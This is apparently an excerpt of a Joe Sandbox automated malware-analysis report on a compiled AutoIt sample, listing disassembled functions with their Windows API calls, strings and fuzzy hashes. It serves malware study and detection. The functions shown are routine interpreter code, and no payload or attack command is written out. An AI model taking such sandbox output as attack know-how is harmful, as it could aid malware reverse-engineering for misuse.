Opcode Fuzzy Hash: b2e17c43deb37d81f0d9722364048c65b9c8cb0167164138de8d843d9ddbbeea
Instruction Fuzzy Hash: 45128E30604202EFDB25CF28C984BA9B7F5BF45320F94457AE496DB6A2CB31EC52DB51

Function 00B177BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B177F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B178B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B178EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B17900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B17946
GetClientRect.USER32(00000000,?), ref: 00B17952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B17996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B179A5
GetStockObject.GDI32(00000011), ref: 00B179B5
SelectObject.GDI32(00000000,00000000), ref: 00B179B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B179C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B179D2
DeleteDC.GDI32(00000000), ref: 00B179DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B17A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B17A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B17A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B17A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B17A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B17AAE
GetStockObject.GDI32(00000011), ref: 00B17AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B17AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B17ACE

Strings

DISPLAY, xrefs: 00B1799B
msctls_progress32, xrefs: 00B17A4F
static, xrefs: 00B17990, 00B17AA8
AutoIt v3, xrefs: 00B1793E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 3559e6863deace7beab74f6894301383445492b3c377bd3c384d1702710d6bb9
Instruction ID: 719050b46108d4b39f0a7e4fbfe85e2eaee2d1cd9808bb907c2c8dfbc7bd9ddd
Opcode Fuzzy Hash: 3559e6863deace7beab74f6894301383445492b3c377bd3c384d1702710d6bb9
Instruction Fuzzy Hash: 55A17171A40219BFEB149F65DD4AFAF7BB9EB48710F004254FA14A71E0CBB4AD41CB60

Function 00B0AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0AF89
GetDriveTypeW.KERNEL32(?,00B2FAC0,?,\\.\,00B2F910), ref: 00B0B066
SetErrorMode.KERNEL32(00000000,00B2FAC0,?,\\.\,00B2F910), ref: 00B0B1C4

Strings

FileBackedVirtual, xrefs: 00B0B193
Unknown, xrefs: 00B0B086, 00B0B12A
Network, xrefs: 00B0B0A4
SAS, xrefs: 00B0B170
RAID, xrefs: 00B0B162
SSA, xrefs: 00B0B14D
ATA, xrefs: 00B0B13F
Virtual, xrefs: 00B0B18C
MMC, xrefs: 00B0B185
Fibre, xrefs: 00B0B154
\\.\, xrefs: 00B0AFDB
SATA, xrefs: 00B0B177
USB, xrefs: 00B0B15B
1394, xrefs: 00B0B146
ATAPI, xrefs: 00B0B138
SCSI, xrefs: 00B0B131
Fixed, xrefs: 00B0B0AE
CDROM, xrefs: 00B0B09A
Removable, xrefs: 00B0B0B8
PhysicalDrive, xrefs: 00B0B012
RAMDisk, xrefs: 00B0B090
SSD, xrefs: 00B0B0F1
iSCSI, xrefs: 00B0B169

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 9957801860f42a7753b2a36f689af3d797adfca71a44e19842d228847d678a7d
Instruction ID: 6a760136c96ae836b49347bbf82571f549929a186e13fc912306b9c2e86b4e07
Opcode Fuzzy Hash: 9957801860f42a7753b2a36f689af3d797adfca71a44e19842d228847d678a7d
Instruction Fuzzy Hash: 0551A530694305ABCB14DB10CEA2E7D7BF1EF1A782B2041D5E81AB72E0DB759D45DB42

Function 00AA6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00AA6A91
__wcsnicmp.LIBCMT ref: 00AA6AA9
__wcsnicmp.LIBCMT ref: 00AA6AC1
__wcsnicmp.LIBCMT ref: 00AA6AD9
__wcsnicmp.LIBCMT ref: 00AA6AF1
__wcsnicmp.LIBCMT ref: 00AA6B09
__wcsnicmp.LIBCMT ref: 00AA6B21
__wcsnicmp.LIBCMT ref: 00AA6B35
__wcsnicmp.LIBCMT ref: 00AA6B76
__wcsnicmp.LIBCMT ref: 00AA6B8A
__wcsnicmp.LIBCMT ref: 00AA6B9E
__wcsnicmp.LIBCMT ref: 00AA6BB2

Strings

#include, xrefs: 00AA6B03
#cs, xrefs: 00AA6B2F, 00AA6B84
#include-once, xrefs: 00AA6AEB
#ce, xrefs: 00AA6BAC
#notrayicon, xrefs: 00AA6AA3
#comments-end, xrefs: 00AA6B98
#pragma compile, xrefs: 00AA6A8B
Bad directive syntax error, xrefs: 00ADE743
Unterminated group of comments, xrefs: 00ADE82C
#requireadmin, xrefs: 00AA6ABB
Cannot parse #include, xrefs: 00ADE819
#comments-start, xrefs: 00AA6B1B, 00AA6B70
#OnAutoItStartRegister, xrefs: 00AA6AD3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 0d620d78f01233ca395ccf054a70a4aa7c50a2b0299bf57cee24ae8cea532546
Instruction ID: ea5539e2ae577975cff7ef535bf24eaade9100014cbaa5fa7f7f92a6f74ee664
Opcode Fuzzy Hash: 0d620d78f01233ca395ccf054a70a4aa7c50a2b0299bf57cee24ae8cea532546
Instruction Fuzzy Hash: BF812A71640215BBCF21BB60CE82FBF77A8AF12740F088025FD46AF1D2EB61DA51C661

Function 00B2AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B2AB99
SetTextColor.GDI32(?,?), ref: 00B2AB9D
GetSysColorBrush.USER32(0000000F), ref: 00B2ABB3
GetSysColor.USER32(0000000F), ref: 00B2ABBE
CreateSolidBrush.GDI32(?), ref: 00B2ABC3
GetSysColor.USER32(00000011), ref: 00B2ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2ABE9
SelectObject.GDI32(?,00000000), ref: 00B2ABFA
SetBkColor.GDI32(?,00000000), ref: 00B2AC03
SelectObject.GDI32(?,?), ref: 00B2AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00B2AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00B2AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B2ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B2ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00B2ACEC
DrawFocusRect.USER32(?,?), ref: 00B2ACF7
GetSysColor.USER32(00000011), ref: 00B2AD05
SetTextColor.GDI32(?,00000000), ref: 00B2AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B2AD21
SelectObject.GDI32(?,00B2A869), ref: 00B2AD38
DeleteObject.GDI32(?), ref: 00B2AD43
SelectObject.GDI32(?,?), ref: 00B2AD49
DeleteObject.GDI32(?), ref: 00B2AD4E
SetTextColor.GDI32(?,?), ref: 00B2AD54
SetBkColor.GDI32(?,?), ref: 00B2AD5E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 5948135816ea9c4a00f1073e40d14a00ea6c85f0d45e5048547f91621a9bef24
Instruction ID: c6f5e541e81c428dc3b010ff552c1e1c770bd549c94ced944ffacc1f262cdeef
Opcode Fuzzy Hash: 5948135816ea9c4a00f1073e40d14a00ea6c85f0d45e5048547f91621a9bef24
Instruction Fuzzy Hash: 5B617D71900219EFDF219FA4DC48EAEBBB9EB08720F104165F915AB2A1DA759D41CF90

Function 00B28C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B28D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B28D45
CharNextW.USER32(0000014E), ref: 00B28D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B28DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B28DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B28DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B28DF9
SetWindowTextW.USER32(?,0000014E), ref: 00B28E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B28E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B28E8C
_memset.LIBCMT ref: 00B28EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B28EFA
_memset.LIBCMT ref: 00B28F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B28F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B28FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00B29088
InvalidateRect.USER32(?,00000000,00000001), ref: 00B290AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B290F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B29121
DrawMenuBar.USER32(?), ref: 00B29130
SetWindowTextW.USER32(?,0000014E), ref: 00B29158

Strings

0, xrefs: 00B290C2

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 125877fa953059fec1e1edf6ffff149e00ac77f8613ea33f8da7e1bf0feb3c52
Instruction ID: 026e06c94d49b94638432b5a66709253f450611515c2e005902133c7db7d015e
Opcode Fuzzy Hash: 125877fa953059fec1e1edf6ffff149e00ac77f8613ea33f8da7e1bf0feb3c52
Instruction Fuzzy Hash: D0E19370901229ABDF219F51DC84EFE7BB9EF05710F1081A9F91DAB290DB748A85DF60

Function 00B24B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B24C51
GetDesktopWindow.USER32 ref: 00B24C66
GetWindowRect.USER32(00000000), ref: 00B24C6D
GetWindowLongW.USER32(?,000000F0), ref: 00B24CCF
DestroyWindow.USER32(?), ref: 00B24CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B24D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B24D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B24D68
SendMessageW.USER32(?,00000421,?,?), ref: 00B24D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B24D90
IsWindowVisible.USER32(?), ref: 00B24DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B24DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B24DDF
GetWindowRect.USER32(?,?), ref: 00B24DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00B24E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00B24E37
CopyRect.USER32(?,?), ref: 00B24E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00B24EB9

Strings

0, xrefs: 00B24BFC
(, xrefs: 00B24E2A
tooltips_class32, xrefs: 00B24D1D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 48f1b750163ddf584a348be63d9cf847d6894b9b43ce6f45ec6978d7539b85b0
Instruction ID: 625d613d88aa069aef5f077a60ec8cc1118a9e8c9dade33ee16961883d9858a3
Opcode Fuzzy Hash: 48f1b750163ddf584a348be63d9cf847d6894b9b43ce6f45ec6978d7539b85b0
Instruction Fuzzy Hash: A9B17771604311AFDB14DF24D988B6ABBE4FF89710F00896CF5999B2A1DB71EC05CB91

Function 00AA27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA28BC
GetSystemMetrics.USER32(00000007), ref: 00AA28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA28EF
GetSystemMetrics.USER32(00000008), ref: 00AA28F7
GetSystemMetrics.USER32(00000004), ref: 00AA291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AA2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AA2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AA297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AA2990
GetClientRect.USER32(00000000,000000FF), ref: 00AA29AE
GetStockObject.GDI32(00000011), ref: 00AA29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA29D5

Part of subcall function 00AA2344: GetCursorPos.USER32(?), ref: 00AA2357
Part of subcall function 00AA2344: ScreenToClient.USER32(00B667B0,?), ref: 00AA2374
Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000001), ref: 00AA2399
Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000002), ref: 00AA23A7

SetTimer.USER32(00000000,00000000,00000028,00AA1256), ref: 00AA29FC

Strings

AutoIt v3 GUI, xrefs: 00AA2974

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d78ba7aed9b82778a245f2eb466b50f0901ae824770ac56577cdf640d6268bad
Instruction ID: f1c0ea434ffa46883a7617a61507d9cade2692d9b10041da9943dc360f89cd6c
Opcode Fuzzy Hash: d78ba7aed9b82778a245f2eb466b50f0901ae824770ac56577cdf640d6268bad
Instruction Fuzzy Hash: A6B13E71A0020AEFDB14DFA8DD45BAE7BB5FB08715F104129FA16A72E0DB749851CB50

Function 00B24069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B240F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B241B6

Strings

SELECTCLEAR, xrefs: 00B24235
ISSELECTED, xrefs: 00B241C1
VIEWCHANGE, xrefs: 00B24375
SELECTINVERT, xrefs: 00B24286
GETTEXT, xrefs: 00B2415F
DESELECT, xrefs: 00B242A4
SELECTALL, xrefs: 00B2421D
FINDITEM, xrefs: 00B24329
GETSUBITEMCOUNT, xrefs: 00B24141
SELECT, xrefs: 00B24250
GETITEMCOUNT, xrefs: 00B24128
GETSELECTED, xrefs: 00B242E4
GETSELECTEDCOUNT, xrefs: 00B24199

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: ad98dad4657e11ebba4848cf9ffdcbe6596745175eceeb169a8a0e658ca69f63
Instruction ID: 56fc28bc9ecf108d9f3b320a1979e0ce4ed72699965608ae7f241f55ecc99133
Opcode Fuzzy Hash: ad98dad4657e11ebba4848cf9ffdcbe6596745175eceeb169a8a0e658ca69f63
Instruction Fuzzy Hash: 4CA19F30214215DFCB14EF20DA91F6AB7E5EF85314F1049ACB89A9B6D2DB31ED0ACB51

Function 00B152F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00B15309
LoadCursorW.USER32(00000000,00007F8A), ref: 00B15314
LoadCursorW.USER32(00000000,00007F00), ref: 00B1531F
LoadCursorW.USER32(00000000,00007F03), ref: 00B1532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00B15335
LoadCursorW.USER32(00000000,00007F01), ref: 00B15340
LoadCursorW.USER32(00000000,00007F81), ref: 00B1534B
LoadCursorW.USER32(00000000,00007F88), ref: 00B15356
LoadCursorW.USER32(00000000,00007F80), ref: 00B15361
LoadCursorW.USER32(00000000,00007F86), ref: 00B1536C
LoadCursorW.USER32(00000000,00007F83), ref: 00B15377
LoadCursorW.USER32(00000000,00007F85), ref: 00B15382
LoadCursorW.USER32(00000000,00007F82), ref: 00B1538D
LoadCursorW.USER32(00000000,00007F84), ref: 00B15398
LoadCursorW.USER32(00000000,00007F04), ref: 00B153A3
LoadCursorW.USER32(00000000,00007F02), ref: 00B153AE
GetCursorInfo.USER32(?), ref: 00B153BE
GetLastError.KERNEL32(00000001,00000000), ref: 00B153E9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: c5e21a553b38dfe912ff9c7ea19a05b0225090073dc4c07ec5a9a1846fb70088
Instruction ID: 0abdbe17069132e9b8935d29fbfc532e1a8d9650f074e146511ea8fc3f9a423f
Opcode Fuzzy Hash: c5e21a553b38dfe912ff9c7ea19a05b0225090073dc4c07ec5a9a1846fb70088
Instruction Fuzzy Hash: 09417670E04319AADB209FB68C498AFFFF8EF51B50B10452FA519E7290DAB85441CE51

Function 00AFAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00AFAAA5
__swprintf.LIBCMT ref: 00AFAB46
_wcscmp.LIBCMT ref: 00AFAB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AFABAE
_wcscmp.LIBCMT ref: 00AFABEA
GetClassNameW.USER32(?,?,00000400), ref: 00AFAC21
GetDlgCtrlID.USER32(?), ref: 00AFAC73
GetWindowRect.USER32(?,?), ref: 00AFACA9
GetParent.USER32(?), ref: 00AFACC7
ScreenToClient.USER32(00000000), ref: 00AFACCE
GetClassNameW.USER32(?,?,00000100), ref: 00AFAD48
_wcscmp.LIBCMT ref: 00AFAD5C
GetWindowTextW.USER32(?,?,00000400), ref: 00AFAD82
_wcscmp.LIBCMT ref: 00AFAD96

Part of subcall function 00AC386C: _iswctype.LIBCMT ref: 00AC3874

Strings

%s%u, xrefs: 00AFAB40

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
